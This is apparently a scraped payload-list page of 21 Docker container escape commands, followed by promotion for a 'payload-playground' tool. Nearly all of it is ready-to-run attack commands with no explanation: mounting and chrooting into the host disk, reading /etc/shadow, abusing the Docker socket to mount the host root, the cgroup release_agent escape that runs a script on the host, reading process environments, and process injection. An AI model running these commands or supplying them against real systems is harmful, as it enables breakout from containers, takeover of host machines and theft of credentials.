$loading...
Docker container escape techniques — privileged container abuse, Docker socket exploitation, cgroup release agent escape, and capability-based escapes. (21 payloads)
ls /.dockerenv && echo "In Docker"cat /proc/1/cgroup | grep -i dockercat /proc/self/status | grep CapEffcapsh --print | grep cap_sys_adminfdisk -lmkdir /mnt/host && mount /dev/sda1 /mnt/hostchroot /mnt/host /bin/bashcat /mnt/host/etc/shadowls -la /var/run/docker.sockdocker -H unix:///var/run/docker.sock run -v /:/mnt -it ubuntu chroot /mntcurl -s --unix-socket /var/run/docker.sock http://localhost/containers/jsonmkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/xecho 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agentecho '#!/bin/sh' > /cmd && echo "id > $host_path/output" >> /cmd && chmod +x /cmdsh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" && cat /outputcat /proc/self/status | grep CapEffpython3 inject.py <host_pid>crontab -lcat /proc/1/environls /var/lib/docker/volumes/docker ps -aLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides